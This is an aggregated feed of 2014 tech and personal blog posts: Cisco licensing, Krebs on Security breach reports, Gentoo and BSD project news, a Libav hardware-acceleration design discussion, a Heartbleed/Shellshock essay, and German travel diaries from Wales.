The number of Cisco AnyConnect licenses needed is based on all the possible unique users that may use any Cisco AnyConnect service. The exact number of Plus or Apex licenses should be based on the total number of unique users that require the specific services associated with each license type.

Die kleinste Lizenz-Stufe ist jetzt für 25 Clients. Für mein Setup mit zwei Macs und auf jedem Mac drei VMs mit XP/Win7/Win8 brauche ich also schon acht Lizenzen.

Was lange überfällig war, ist dass verschiede Versionen gemischt werden können:

Cisco AnyConnect Apex and Plus licenses can be mixed in the same environment.
The number of Plus licenses can be smaller or greater than the number of Apex licenses.

Das Lizens-Management bringt uns eventuell noch ein paar „Herausforderungen“ …

When a Cisco ASA is used Cisco AnyConnect, your production activation key (PAK) for Plus or Apex must be registered to the serial number of each individual Cisco ASA via the Cisco License Management portal.

Wie das genaue Handling sein wird, vor allem wenn man Szenarien hat, bei denen ein Client auf viele verschiedene ASAs zugreift, dass muss sich noch zeigen. Ich hoffe, dass es da keine Probleme geben wird.

Die genaue Beschreibung des neuen Lizenzmodells gibt es im Cisco AnyConnect Ordering Guide.

Who’s Watching Your WebEx?

by BrianKrebs via Krebs on Security »

KrebsOnSecurity spent a good part of the past week working with Cisco to alert more than four dozen companies — many of them household names — about regular corporate WebEx conference meetings that lack passwords and are thus open to anyone who wants to listen in.

Department of Energy’s WebEx meetings.
At issue are recurring video- and audio conference-based meetings that companies make available to their employees via WebEx, a set of online conferencing tools run by Cisco. These services allow customers to password-protect meetings, but it was trivial to find dozens of major companies that do not follow this basic best practice and allow virtually anyone to join daily meetings about apparently internal discussions and planning sessions.

Many of the meetings that can be found by a cursory search within an organization’s “Events Center” listing on Webex.com seem to be intended for public viewing, such as product demonstrations and presentations for prospective customers and clients. However, from there it is often easy to discover a host of other, more proprietary WebEx meetings simply by clicking through the daily and weekly meetings listed in each organization’s “Meeting Center” section on the Webex.com site.

Some of the more interesting, non-password-protected recurring meetings I found include those from Charles Schwab, CSC, CBS, CVS, The U.S. Department of Energy, Fannie Mae, Jones Day, Orbitz, Paychex Services, and Union Pacific. Some entities even also allowed access to archived event recordings.

Cisco began reaching out to each of these companies about a week ago, and today released an all-customer alert (PDF) pointing customers to a consolidated best-practices document written for Cisco WebEx site administrators and users.

“In the first week of October, we were contacted by a leading security researcher,” Cisco wrote. “He showed us that some WebEx customer sites were publicly displaying meeting information online, including meeting Time, Topic, Host, and Duration. Some sites also included a ‘join meeting’ link.”

Omar Santos, senior incident manager of Cisco’s product security incident response team, acknowledged that the company’s customer documentation for securing WebEx meetings had previously been somewhat scattered across several different Cisco online properties.  But Santos said the default setting for its WebEx meetings has always been for a password to be included on a meeting when created.

“If there is a meeting you can find online without a password, it means the site administrator or the meeting creator has elected not to include a password,” Santos said. “Only if the site administrator has elected to allow no passwords can the meeting organizer choose the ability to have no passwords on that meeting.”

Update, 11:24 a.m. ET: Cisco has published a blog post about this as well, available here.

S390 documentation in the Gentoo Wiki

by Raúl Porcel via Armin76's Blog »

Hi all,

One of the projects I had last year that I ended up suspending due to lack of time was S390 documentation and installation materials. For some reason there wasn’t any materials available to install Gentoo on a S390 system without having to rely in an already installed distribution.

Thanks to Marist College, IBM and Linux Foundation we were able to get two VMs for building the release materials, and thanks to Dave Jones @ V/Soft Software I was able to document the installation in a z/VM environment. Also thanks to the Debian project, since I based the materials in their procedure.

So most of the part of last year and the last few weeks I’ve been polishing and finishing the documentation I had around. So what I’ve documented: Gentoo S390 on the Hercules emulator and Gentoo S390 on z/VM. Both are based in the same pattern, since

Gentoo S390 on the Hercules emulator

This is probably the guide that will be more interesting because everyone can run the Hercules emulator, while not everyone has access to a z/VM instance. Hercules emulates an S390 system, it’s like QEMU. However QEMU, from what I can tell, is unable to emulate an S390 system in a non-S390 system, while Hercules does.

So if you want to have some fun and emulate a S390 machine in your computer, and install and use Gentoo in it, then follow the guide: https://wiki.gentoo.org/wiki/S390/Hercules

Gentoo S390 on z/VM

For those that have access to z/VM and want to install Gentoo, the guide explains all the steps needed to get a Gentoo System working. Thanks to Dave Jones I was able to create the guide and test the release materials, he even did a presentation in the 2013 VM Workshop! Link to the PDF . Keep in mind that some of the instructions given there are now outdated, mainly the links.

The link to the documentation is: https://wiki.gentoo.org/wiki/S390/Install

I have also written some tips and tricks for z/VM: https://wiki.gentoo.org/wiki/S390/z/VM_tips_and_tricks They’re really basic and were the ones I needed for creating the guide.

Installation materials

Lastly, we already had the autobuilds stage3 for s390, but we lacked the boot environment for installing Gentoo. This boot environment/release material is simply a kernel and a initramfs built with Gentoo’s genkernel based in busybox. It builds an environment using busybox like the livecd in amd64/x86 or other architectures. I’ve integrated the build of these boot environment with the autobuilds, so each week there should be an updated installation environment.

Have fun!


FreeBSD 10.1-RC2 Available

by Webmaster Team via FreeBSD News Flash »

The second RC build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

VDD14 Discussions: HWAccel2

by lu_zero via Luca Barbato »

I took part to the Videolan Dev Days 14 weeks ago, sadly I had been too busy so the posts about it will appear in scattered order and sort of delayed.

Hardware acceleration

In multimedia, video is basically crunching numbers and get pixels or crunching pixels and getting numbers. Most of the operation are quite time consuming on a general purpose CPU and orders of magnitude faster if done using DSP or hardware designed for that purpose.

Availability

Most of the commonly used system have video decoding and encoding capabilities either embedded in the GPU or in separated hardware. Leveraging it spares lots of cpu cycles and lots of battery if we are thinking about mobile.

Capabilities

The usually specialized hardware has the issue of being inflexible and that does clash with the fact most codec evolve quite quickly with additional profiles to extend its capabilities, support different color spaces, use additional encoding strategies and such. Software decoders and encoders are still needed and need badly.

Hardware acceleration support in Libav

HWAccel 1

The hardware acceleration support in Libav grew (like other eldritch-horror tentacular code we have lurking from our dark past) without much direction addressing short term problems and not really documenting how to use it.

As result all the people that dared to use it had to guess, usually used internal symbols that they wouldn’t have to use and all in all had to spend lots of time and
had enough grief when such internals changed.

Usage
Every backend required a quite large deal of boilerplate code to initialize the backend-specific context and to render the hardware surface wrapped in the AVFrame.

The Libav backend interface was quite vague in itself, requiring to override get_format and get_buffer in some ways.

Overall to get the whole thing working the library user was supposed to do about 75% of the work. Not really nice considering people uses libraries to abstract complexity and avoid repetition

Backend support
As that support was written with just slice-based decoder in mind, it expects that all the backend would require the software decoder to parse the bitstream, prepare slices of the frame and feed the backend with them.

Sadly new backends appeared and they take directly either bitstream or full frames, the approach had been just to take the slice, add back the bitstream markers the backend library expects and be done with that.

Initial HWAccel 2 discussion

Last year since the number of backends I wanted to support were all bitstream-oriented and not fitting the mode at all I started thinking about it and the topic got discussed a bit during VDD 13. Some people that spent their dear time getting hwaccel1 working with their software were quite wary of radical changes so a path of incremental improvements got more or less put down.

HWAccel 1.2
  • default functions to allocate and free the backend context and make the struct to interface between Libav and the backend extensible without causing breakage.
  • avconv now can use some hwaccel, providing at least an example on how to use them and a mean to test without having to gut VLC or mpv to experiment.
  • document better the old-style hwaccels so at least some mistakes could be avoided (and some code that happen to work by sheer look won’t break once the faulty assuptions cease to exist)
The new VDA backend and the update VDPAU backend are examples of it.

HWAccel 1.3
  • extend the callback system to fit decently bitstream oriented backends.
  • provide an example of backend directly providing normal AVFrames.
The Intel QSV backend is used as a testbed for hwaccel 1.3.

The future of HWAccel2

Another year, another meeting. We sat down again to figure out how to get further closer to the end result of not having the casual users write boilerplate code to use hwaccel to get at least some performance boost and yet let the power users have the full access to the underpinnings so they can get most of it without having to write everything from scratch.

Simplified usage, hopefully really simple

The user just needs to use AVOption to set specific keys such as hwaccel and optionally hwaccel-device and the library will take care of everything. The frames returned by avcodec_decode_video2 will contain normal system memory and commonly used pixel formats. No further special code will be needed.

Advanced usage, now properly abstracted

All the default initialization, memory/surface allocation and such will remain overridable, with the difference that an additional callback called get_hw_surface will be introduced to separate completely the hwaccel path from the software path and specific functions to hand over the ownership of backend contexts and surfaces will be provided.

The software fallback won’t be anymore automagic in this case, but a specific AVERROR_INPUT_CHANGED will be returned so would be cleaner for the user reset the decoder without losing the display that maybe was sharing the same context. This leads the way to a simpler mean to support multiple hwaccel backends and fall back from one to the other to eventually the software decoding.

Migration path

We try our best to help people move to the new APIs.

Moving from HWAccel1 to HWAccel2 in general would result in less lines of code in the application, the people wanting to keep their callback need to just set them after avcodec_open2 and move the pixel specific get_buffer to get_hw_surface. The presence of av_hwaccel_hand_over_frame and av_hwaccel_hand_over_context will make much simpler managing the backend specific resources.

Expected Time of Arrival

Right now the review is on the HWaccel1.3, I hope to complete this step and add few new backends to test how good/bad that API is before adding the other steps. Probably HWAccel2 will take at least other 6 months.

Help in form of code or just moral support is always welcome!

Netflix on Gentoo

by admin via Mike Pagano's Weblog »

Contrary to some articles you may read on the internet, NetFlix is working great on Gentoo.

Here’s a snap shot of my system running 3.12.30-gentoo sources and google chrome version 39.0.2171.19_p1.



 

$ equery l google-chrome-beta
* Searching for google-chrome-beta …
[IP-] [ ] www-client/google-chrome-beta-39.0.2171.19_p1:0

 


Malware Based Credit Card Breach at Kmart

by BrianKrebs via Krebs on Security »

Sears Holding Co. late Friday said it recently discovered that point-of-sale registers at its Kmart stores were compromised by malicious software that stole customer credit and debit card information. The company says it has removed the malware from store registers and contained the breach, but that the investigation is ongoing.

“Yesterday our IT teams detected that our Kmart payment data systems had been breached,” said Chris Brathwaite, spokesman for Sears. “They immediately launched a full investigation working with a leading IT security firm. Our investigation so far indicates that the breach started in early September.”

According to those investigators, Brathwaite said, “our systems were infected with a form of malware that was currently undetectable by anti-malware systems. Our IT teams quickly removed that malware, however we do believe that debit and credit card numbers have been compromised.”

Brathwaite stressed that the data stolen included only “track 2″ data from customer credit and debit cards, and did not include customer names, email address, physical address, Social Security numbers, PINs or any other sensitive information.

However, he acknowledged that the information stolen would allow thieves to create counterfeit copies of the stolen cards. So far, he said, Sears has no indication that the cards are yet being fraudulently used.

Sears said it has no indication that any Sears, Roebuck customers were impacted, and that the malware infected the payment data systems at Kmart stores only.

More on this developing story as updates become available. For now, see this notice on Kmart’s home page.

Dairy Queen Confirms Breach at 395 Stores

by BrianKrebs via Krebs on Security »

Nationwide fast-food chain Dairy Queen on Thursday confirmed that malware installed on cash registers at some 395 stores resulted in the theft of customer credit and debit card information. The acknowledgement comes nearly six weeks after this publication first broke the news that multiple banks were reporting indications of a card breach at Dairy Queen locations across the country.

In a statement issued Oct. 9, Dairy Queen listed nearly 400 DQ locations and one Orange Julius location that were found to be infected with the widely-reported Backoff malware that is targeting retailers across the country.

Curiously, Dairy Queen said that it learned about the incident in late August from law enforcement officials. However, when I first reached out to Dairy Queen on Aug. 22 about reports from banking sources that the company was likely the victim of a breach, the company said it had no indication of a card breach at any of its 4,500+ locations. Asked about the apparent discrepancy, Dairy Queen spokesman Dean Peters said that by the time I called the company and inquired about the breach, Dairy Queen’s legal team had indeed already been notified by law enforcement.

“When I told you we had no knowledge, I was being truthful,” Peters said. “However, I didn’t know at that time that someone [from law enforcement] had already contacted Dairy Queen.”

In answer to inquiries from this publication, Dairy Queen said its investigation revealed that the same third-party point-of-sale vendor was used at all of the breached locations, although it declined to name the affected vendor. However, multiple sources contacted by this reporter said the point-of-sale vendor in question was Panasonic Retail Information Systems.

In response to questions from KrebsOnSecurity, Panasonic issued the following non-denial statement:

“Panasonic is proud that we can count Dairy Queen as a point-of-sale hardware customer. We have seen the media reports this morning about the data breaches in a number of Dairy Queen outlets. To the best of our knowledge, these types of malware breaches are generally associated with network security vulnerabilities and are not related to the point-of-sale hardware we provide. Panasonic stands ready to provide whatever assistance we can to our customers in resolving the issue.”

The Backoff malware that was found on compromised Dairy Queen point-of-sale terminals is typically installed after attackers compromise remote access tools that allow users to connect to the systems over the Internet. All too often, the user accounts for these remote access tools are protected by weak or easy-to-guess username and password pairs.

The incident at DQ fits a pattern of breaches involving retail chains that rely heavily on franchisees and poorly-secured point-of-sale products which allow remote access over the Internet. On Sept. 24, nationwide sandwich chain Jimmy John’s confirmed reports first published in this blog about a likely point-of-sale breach at the company’s stores. While there are more than 1,900 franchised Jimmy John’s locations, only 216 were hit, and they were all running the same point-of-sale software from Newtown, Pa. based Signature Systems. On Sept. 26, Signature disclosed that at least 100 other mom-and-pop restaurants that it serves were compromised through its point-of-sale systems.

Earlier in September, KrebsOnSecurity reported that a different hacked point-of-sale provider was the driver behind a breach that impacted more than 330 Goodwill locations nationwide. That breach, which targeted payment vendor C&K Systems Inc., persisted for 18 months, and involved two other as-yet unnamed C&K customers.

Dairy Queen said that it will be offering free credit monitoring services to affected customers. This has become the standard response for companies trying to burnish their public image in the wake of a card breach, even though credit monitoring services do nothing to help consumers detect or prevent fraud on existing accounts — such as credit and debit cards.

There is no substitute for monitoring your monthly bank and credit card statements for unauthorized or suspicious transactions. If you’re looking for information about how to protect yourself or loved ones from identity thieves, check out the tips in the latter half of this article.

Signed Malware = Expensive “Oops” for HP

by BrianKrebs via Krebs on Security »

Computer and software industry maker HP is in the process of notifying customers about a seemingly harmless security incident in 2010 that nevertheless could prove expensive for the company to fix and present unique support problems for users of its older products.

Earlier this week, HP quietly produced several client advisories stating that on Oct. 21, 2014 it plans to revoke a digital certificate the company previously used to cryptographically sign software components that ship with many of its older products. HP said it was taking this step out of an abundance of caution because it discovered that the certificate had mistakenly been used to sign malicious software way back in May 2010.

Code-signing is a practice intended to give computer users and network administrators additional confidence about the integrity and security of a file or program. Consequently, private digital certificates that major software vendors use to sign code are highly prized by attackers, because they allow those attackers to better disguise malware as legitimate software.

For example, the infamous Stuxnet malware – apparently created as a state-sponsored project to delay Iran’s nuclear ambitions — contained several components that were digitally signed with certificates that had been stolen from well-known companies. In previous cases where a company’s private digital certificates have been used to sign malware, the incidents were preceded by highly targeted attacks aimed at stealing the certificates. In Feb. 2013, whitelisting software provider Bit9 discovered that digital certificates stolen from a developer’s system had been used to sign malware that was sent to several customers who used the company’s software.

But according to HP’s Global Chief Information Security Officer Brett Wahlin, nothing quite so sexy or dramatic was involved in HP’s decision to revoke this particular certificate. Wahlin said HP was recently alerted by Symantec about a curious, four-year-old trojan horse program that appeared to have been signed with one of HP’s private certificates and found on a server outside of HP’s network. Further investigation traced the problem back to a malware infection on an HP developer’s computer.

HP investigators believe the trojan on the developer’s PC renamed itself to mimic one of the file names the company typically uses in its software testing, and that the malicious file was inadvertently included in a software package that was later signed with the company’s digital certificate. The company believes the malware got off of HP’s internal network because it contained a mechanism designed to transfer a copy of the file back to its point of origin.



Wahlin stressed that the software package in question was never included in software that was shipped to customers or put into production. Further, he said, there is no evidence that any of HP’s private certs were stolen.

“When people hear this, many will automatically assume we had some sort of compromise within our code signing infrastructure, and that is not the case,” he said. “We can show that we’ve never had a breach on our [certificate authority] and that our code-signing infrastructure is 100 percent intact.”

Even if the security concerns from this incident are minimal, the revocation of this certificate is likely to create support issues for some customers. The certificate in question expired several years ago, and so it cannot be used to digitally sign new files. But according to HP, it was used to sign a huge swath of HP software — including crucial hardware and software drivers, and other components that interact in fundamental ways with the Microsoft Windows operating system.

Thus, revoking the certificate means that HP must re-sign software that is already in use. Wahlin said most customers impacted by this change will merely encounter warnings from Windows if they try to reinstall certain drivers from original installation media, for example. But a key unknown at this point is how this move will affect HP computers that have built-in “recovery partitions” — small sections at the beginning of the computer’s hard drive that can be used to restore the system to its original, factory-shipped software configuration.

“The interesting thing that pops up here — and even Microsoft doesn’t know the answer to this — is what happens to systems with the restore partition, if they need to be restored,” Wahlin said. “Our PC group is working through trying to create solutions to help customers if that actually becomes a real-world scenario, but in the end that’s something we can’t test in a lab environment until that certificate is officially revoked by Verisign on October 21.”

Ein Tag am Meer

by André M. via My Universe »

Aufgewachsen am Meer, halte ich es natürlich nicht lange ohne Salz in der Luft aus. schon gar nicht, wenn das Meer so nah ist! Also ging es gestern nach Barry am Bristol Channel. Während der ganzen Fahrt regnete es in Strömen, doch kaum konnte ich das Meer sehen, verzogen sich die Wolken und die Stadt begrüßte mich mit einem wunderschönen Regenbogen, den ich leider mangels Parkplatz nicht fotografieren konnte.

Eigentlich sollte es dort laut meiner Touristen-Straßenkarte ein paar historische Stätten geben, doch da sich die Stadtverwaltung die Mühe gemacht hatte, bereits etliche Kilom... äh Meilen vor der Stadt auf "Barry Island" und seine Attraktionen hinzuweisen, änderte ich kurzerhand meine Pläne und folgte der gut ausgeschilderten Route auf die "Insel", die eigentlich nur zwei Halbinseln ist (aber zwei halbe sind ...?). Der riesige Touristenparkplatz war natürlich komplett leer, also habe ich mein Auto nicht dort sondern schön direkt am Strand geparkt. Hat halt seine Vorteile, außerhalb der Saison Urlaub zu machen.

Beim Aussteigen merkte ich dann sofort, dass zwar der Regen ab- dafür aber ein ordentlicher Sturm aufgezogen war. Perfektes Wetter also. Schnell wurde klar, dass wohl gerade ablaufend Wasser war – reichlich viel "Strand", trocken liegende Muschelfelsen und Wellen, die trotz starken Windes quasi "auf der Stelle stehen" sind dann doch recht deutliche Anzeichen.

Eine Bucht weiter dann der alte Hafen von Barry, mitten im Hafenbecken vier kleine bis sehr kleine Boote, von denen offensichtlich noch höchstens zwei schwimmfähig waren – und alle lagen in Morast zwischen harten Gräsern. Kein Wasser weit und breit im Hafen. Und die Zufahrt zum Hafen machte diesbezüglich auch nicht besonders viel Hoffnung angesichts eines großen Hügels aus Strandsand, der dort offenbar im Laufe der Jahre angeschwemmt worden war.

Da gerade wieder ein Schauer aufzog, bin ich schnell in ein Restaurant geflüchtet für ein eher mageres (und hoffnungslos überteuertes) "Cajun Chicken"-Salätchen. Sowas geht anderswo als Vorspeise durch, und sollte schon 6 Pfund kosten. Da koche ich mir lieber abends selbst was richtiges! Immerhin schien nach dem Essen wieder die Sonne und so bin ich dann in die Innenstadt von Barry, wo man übrigens direkt an der Fußgängerzone gratis im Parkhaus parken kann. So richtig viel zu sehen gibt es dort außer dem Rathaus und der Hafenkommandatur am neuen Hafen nicht. Aber alles in allem ist es eine schöne, typisch britisch anmutende Stadt mit vielen Straßenzügen voller nahezu identischer Reihenhäuser. Ja, das sieht hier wirklich so aus, wie man das im Fernsehen immer sieht!

Nach einem gemütlichen Spaziergang stand dann die Sonne schon recht tief und ich dachte mir, dass bei diesem Licht bestimmt schöne Bilder der Schiffswracks im alten Hafen zu machen wären – also bin ich nochmal hin. Zu meiner Überraschung konnte ich bereits von weitem sehen, dass Sturm und Flut das Wasser bereits bis zur Kuppe der Sandbank am Eingang des Hafens gedrückt hatten. Es war also nur noch eine Frage der Zeit, bis das Hafenbecken sich mit Wasser füllen würde! Bei schönstem Wetter konnte ich also die nächste halbe Stunde (oder so) im Licht der untergehenden Sonne beobachten, wie ihre Kräfte mit denen des Mondes und des Windes zusammenwirken.

Heute war leider so richtig fieses Wetter. Und zwar "fies" im Sinne von "hinterhältig, gemein": Immer wieder guckte mal für ein paar Augenblicke die Sonne durch die Wolken, doch kaum, dass man die Jacke in der Hand und die Schuhe angezogen hatte, war sie wieder verschwunden. Sobald man einen Fuß vor die Tür setzte fing es an zu schütten, als gäbs kein Morgen mehr. War man wieder im Trockenen, hörte es prompt wieder auf. So habe ich es geschafft, dreimal nass zu werden, obwohl ich bisher insgesamt vielleicht 5 Minuten unter freiem Himmel war (jeweils auf dem Weg vom oder zum Auto). Aber der Wetterbericht meint, morgen würde es wieder besser werden, mal schaun.

Bis dann

André

Greetings from Wales

by André M. via My Universe »

Hello from Wales!

Ich bin mal wieder auf Reisen, dieses Mal in Wales. Und da um diese Jahreszeit die Postkarten hier genauso schwer zu finden sind, wie andere Touristen, dachte ich, ich lasse Euch – für den Fall, dass das mit den versprochenen Postkarten nicht klappt – an dem teilhaben, was ich hier so täglich erlebe.

Was bisher geschah ...

Am Montag (vorgestern) bin ich, trotz extrem verspätetem Abflug, nach einem ziemlich unruhigen Flug um kurz nach 3pm in Heathrow angekommen. Schnell das Auto geholt – ein VW-Golf Diesel, dem als einziges Extra nur der Tempomat fehlt – und ab auf die M4 in Richtung "SOUTH WALES". Kurz vor Wales dann ein kurzer Schrecken: die Brücke über den River Severn – bzw. dessen Mündung in den Bristol Channel – ist mautpflichtig. Und ich hatte noch gar kein Bargeld in der Tasche. Kurzentschlossen also die letzte Ausfahrt raus, nach einem Geldautomaten suchen ... stellt sich heraus: die letzte Ausfahrt ist ein Autobahndreieck mit der M48. Also wieder die nächste Ausfahrt ... dummerweise ein Autobahnkreuz mit der M5. Neues Spiel, neues Glück? Nunja, der Stau auf der linken Spur sah zumindest vielversprechend aus. Und nur 30 Minuten später war ich dann auch schon auf einer Raststätte.

Frisch gestärkt (machen die hier überall so wenig Salz dran?) und mit ein paar Scheinen Monopoly-Geld ... ähm ... Pfund Sterling in der Tasche gings wieder zurück auf die Autobahn. Immerhin: alle Staus, die zuvor noch im Verkehrsfunk zu hören waren, waren inzwischen verschwunden. Die Brücke selbst: ein Erlebnis! Schade, dass ich weder davor noch dahinter (ganz zu schweigen von "irgendwo auf der Brücke") einen Rastplatz zum Fotografieren finden konnte. Ich werde auf jeden Fall versuchen, dass mal bei Gelegenheit nachzuholen!

Gegen halb acht kam ich dann endlich an meinem Ziel an: Taff's Well nördlich von Cardiff. Eine tolle Unterkunft, nette Vermieter, allerdings ist "Railway Cottage" sehr viel sprechender gemeint gewesen, als ich ursprünglich gedacht hatte: Während das Schlafzimmer zur Dorfstraße rausgeht (die leider tagsüber relativ stark frequentiert ist), fährt quasi direkt vor dem Wohnzimmer (etwa 10 Meter entfernt) alle 10 Minuten die Bahn Cardiff-Pontypridd durch. Immerhin ist nachts Ruhe – was aber auch bedeutet, dass man ab 11pm nicht mehr mit der Bahn aus Cardiff heraus kommt.

Dienstag morgen habe ich erstmal ausgeschlafen und dann gegen 11am erstmal Elisa geweckt, die gerade in Cardiff studiert und im Nachbardorf wohnt. Nach einem ausgedehnten "Welsh Breakfast" musste sie dann zur Uni und ich hab mich aufgemacht, die Gegend hier ein wenig zu erkunden. Eigentlich war mein Plan, über Land – also unter Umgehung der unzähligen Autobahnen hier – zum Coch Castle zu fahren. Irgendwie landete ich dann aber westlich von Cardiff auf der M4 ... also doch Autobahn, erstmal zurück Richtung Taff's Well und dann den Schildern zur Burg gefolgt. Eigentlich gar nicht so schwer, jedenfalls am Anfang. Doch plötzlich – die Burg schon weit hinter mir – keine Schilder mehr. Stattdessen enge Bergstraßen und reichlich optimistische, wenn auch stets sehr nette, einheimische Autofahrer. Dann plötzlich wieder Schilder, doch wie sich herausstellt zum Caerphilly Castle. Meinetwegen. Sogar den Parkplatz habe ich dort auf Anhieb gefunden – und trotz irreführender Ausschilderung auch den Fußweg zur Burg. Ein tolles Bauwerk, dass ich unbedingt nochmal von innen sehen muss! Aufgrund der späten Stunde reichte es dieses Mal nämlich nur für einen Rundgang außen herum. Und da ich ohnehin auf dem Weg zurück zur Unterkunft an Coch Castle vorbei musste, habe ich einen zweiten Versuch gewagt – und sogar durch Zufall den Wanderparkplatz gefunden, von dem aus man dann zu Fuß zur Burg weiter kommt! Nun, auch das bleibt für einen anderen Tag.

Abends dann ein kleiner Ausflug nach Cardiff, eigentlich mit dem Ziel, mich mit Elisa und ein paar Ihrer Mitstudenten zu treffen. Doch letztere tauchten nicht auf und so haben wir uns selbst einen Pub gesucht, uns gegenseitig auf den neuesten Stand gebracht und Pläne für die nächsten Tage geschmiedet. Der Rückweg ... nunja, eine kleine Odyssee über Cardiffs unzählige Schnellstraßen ... Nachdem ich ungefähr zehnmal im Kreisverkehr zu früh rausgefahren bin (jeweils bei dem Versuch, zu wenden), hat dann Elisa das Lesen des TomTom übernommen, und siehe da ...

Soweit bisher, heute will ich ans Wasser. Und bei der Burgen-Dichte hier, wird es da bestimmt auch eine Burg zum Besichtigen geben.

Bis morgen!

André

py3status v1.6

by ultrabug via Ultrabug »

Back from holidays, this new version of py3status was due for a long time now as it features a lot of great contributions !

This version is dedicated to the amazing @ShadowPrince who contributed 6 new modules

Changelog

  • core : rename the ‘examples’ folder to ‘modules’
  • core : Fix include_paths default wrt issue #38, by Frank Haun
  • new vnstat module, by Vasiliy Horbachenko
  • new net_rate module, alternative module for tracking network rate, by Vasiliy Horbachenko
  • new scratchpad-counter module and window-title module for displaying current windows title, by Vasiliy Horbachenko
  • new keyboard-layout module, by Vasiliy Horbachenko
  • new mpd_status module, by Vasiliy Horbachenko
  • new clementine module displaying the current “artist – title” playing in Clementine, by François LASSERRE
  • module clementine.py: Make python3 compatible, by Frank Haun
  • add optional CPU temperature to the sysdata module, by Rayeshman

Contributors

Huge thanks to this release’s contributors :

  • @ChoiZ
  • @fhaun
  • @rayeshman
  • @ShadowPrince

What’s next ?

The next 1.7 release of py3status will bring a neat and cool feature which I’m sure you’ll love, stay tuned !

How to stop Bleeding Hearts and Shocking Shells

by Hanno Böck via Hanno's blog »

The free software community was recently shattered by two security bugs called Heartbleed and Shellshock. While technically these bugs where quite different I think they still share a lot.

Heartbleed hit the news in April this year. A bug in OpenSSL that allowed to extract privat keys of encrypted connections. When a bug in Bash called Shellshock hit the news I was first hesistant to call it bigger than Heartbleed. But now I am pretty sure it is. While Heartbleed was big there were some things that alleviated the impact. It took some days till people found out how to practically extract private keys - and it still wasn't fast. And the most likely attack scenario - stealing a private key and pulling off a Man-in-the-Middle-attack - seemed something that'd still pose some difficulties to an attacker. It seemed that people who update their systems quickly (like me) weren't in any real danger.

Shellshock was different. It's astonishingly simple to use and real attacks started hours after it became public. If circumstances had been unfortunate there would've been a very real chance that my own servers could've been hit by it. I usually feel the IT stuff under my responsibility is pretty safe, so things like this scare me.

What OpenSSL and Bash have in common

Shortly after Heartbleed something became very obvious: The OpenSSL project wasn't in good shape. The software that pretty much everyone in the Internet uses to do encryption was run by a small number of underpaid people. People trying to contribute and submit patches were often ignored (I know that, I tried it). The truth about Bash looks even grimmer: It's a project mostly run by a single volunteer. And yet almost every large Internet company out there uses it. Apple installs it on every laptop. OpenSSL and Bash are crucial pieces of software and run on the majority of the servers that run the Internet. Yet they are very small projects backed by few people. Besides they are both quite old, you'll find tons of legacy code in them written more than a decade ago.

People like to rant about the code quality of software like OpenSSL and Bash. However I am not that concerned about these two projects. This is the upside of events like these: OpenSSL is probably much securer than it ever was and after the dust settles Bash will be a better piece of software. If you want to ask yourself where the next Heartbleed/Shellshock-alike bug will happen, ask this: What projects are there that are installed on almost every Linux system out there? And how many of them have a healthy community and received a good security audit lately?

Software installed on almost any Linux system

Let me propose a little experiment: Take your favorite Linux distribution, make a minimal installation without anything and look what's installed. These are the software projects you should worry about. To make things easier I did this for you. I took my own system of choice, Gentoo Linux, but the results wouldn't be very different on other distributions. The results are at at the bottom of this text. (I removed everything Gentoo-specific.) I admit this is oversimplifying things. Some of these provide more attack surface than others, we should probably worry more about the ones that are directly involved in providing network services.

After Heartbleed some people already asked questions like these. How could it happen that a project so essential to IT security is so underfunded? Some large companies acted and the result is the Core Infrastructure Initiative by the Linux Foundation, which already helped improving OpenSSL development. This is a great start and an example for an initiative of which we should have more. We should ask the large IT companies who are not part of that initiative what they are doing to improve overall Internet security.

Just to put this into perspective: A thorough security audit of a project like Bash would probably require a five figure number of dollars. For a small, volunteer driven project this is huge. For a company like Apple - the one that installed Bash on all their laptops - it's nearly nothing.

There's another recent development I find noteworthy. Google started Project Zero where they hired some of the brightest minds in IT security and gave them a single job: Search for security bugs. Not in Google's own software. In every piece of software out there. This is not merely an altruistic project. It makes sense for Google. They want the web to be a safer place - because the web is where they earn their money. I like that approach a lot and I have only one question to ask about it: Why doesn't every large IT company have a Project Zero?

Sparking interest

There's another aspect I want to talk about. After Heartbleed people started having a closer look at OpenSSL and found a number of small and one other quite severe issue. After Bash people instantly found more issues in the function parser and we now have six CVEs for Shellshock and friends. When a piece of software is affected by a severe security bug people start to look for more. I wonder what it'd take to have people looking at the projects that aren't in the spotlight.

I was brainstorming if we could have something like a "free software audit action day". A regular call where an important but neglected project is chosen and the security community is asked to have a look at it. This is just a vague idea for now, if you like it please leave a comment.

That's it. I refrain from having discussions whether bugs like Heartbleed or Shellshock disprove the "many eyes"-principle that free software advocates like to cite, because I think these discussions are a pointless waste of time. I'd like to discuss how to improve things. Let's start.

Here's the promised list of Gentoo packages in the standard installation:

bzip2
gzip
tar
unzip
xz-utils
nano
ca-certificates
mime-types
pax-utils
bash
build-docbook-catalog
docbook-xml-dtd
docbook-xsl-stylesheets
openjade
opensp
po4a
sgml-common
perl
python
elfutils
expat
glib
gmp
libffi
libgcrypt
libgpg-error
libpcre
libpipeline
libxml2
libxslt
mpc
mpfr
openssl
popt
Locale-gettext
SGMLSpm
TermReadKey
Text-CharWidth
Text-WrapI18N
XML-Parser
gperf
gtk-doc-am
intltool
pkgconfig
iputils
netifrc
openssh
rsync
wget
acl
attr
baselayout
busybox
coreutils
debianutils
diffutils
file
findutils
gawk
grep
groff
help2man
hwids
kbd
kmod
less
man-db
man-pages
man-pages-posix
net-tools
sed
shadow
sysvinit
tcp-wrappers
texinfo
util-linux
which
pambase
autoconf
automake
binutils
bison
flex
gcc
gettext
gnuconfig
libtool
m4
make
patch
e2fsprogs
udev
linux-headers
cracklib
db
e2fsprogs-libs
gdbm
glibc
libcap
ncurses
pam
readline
timezone-data
zlib
procps
psmisc
shared-mime-info

Testers: CentOS 6.5 Emulation and New AppCafe

by dru via Official PC-BSD Blog »

For those of you on Edge and who wish to test the new Linux emulation and the new Appcafe, Kris has posted the instructions:

CentOS 6.5 emulation has been made the default for the EDGE packages going out this weekend. This replaces the legacy f10 package set. I’ve tested / confirmed that Flash works properly, haven’t tried net-im/skype4 yet, but a package is available for those who want to try.

I’ve seen a few issues doing the update here with PKG. It seems often the conflict detection won’t remove f10 on its own, so I’ve had to do this:

# pkg update –f
# pkg delete linux_base-f10\*
# pkg install nvidia-driver (Skip this if you don’t use nvidia drivers)
# pkg install pcbsd-base
# pkg upgrade
# pc-extractoverlay ports
# reboot

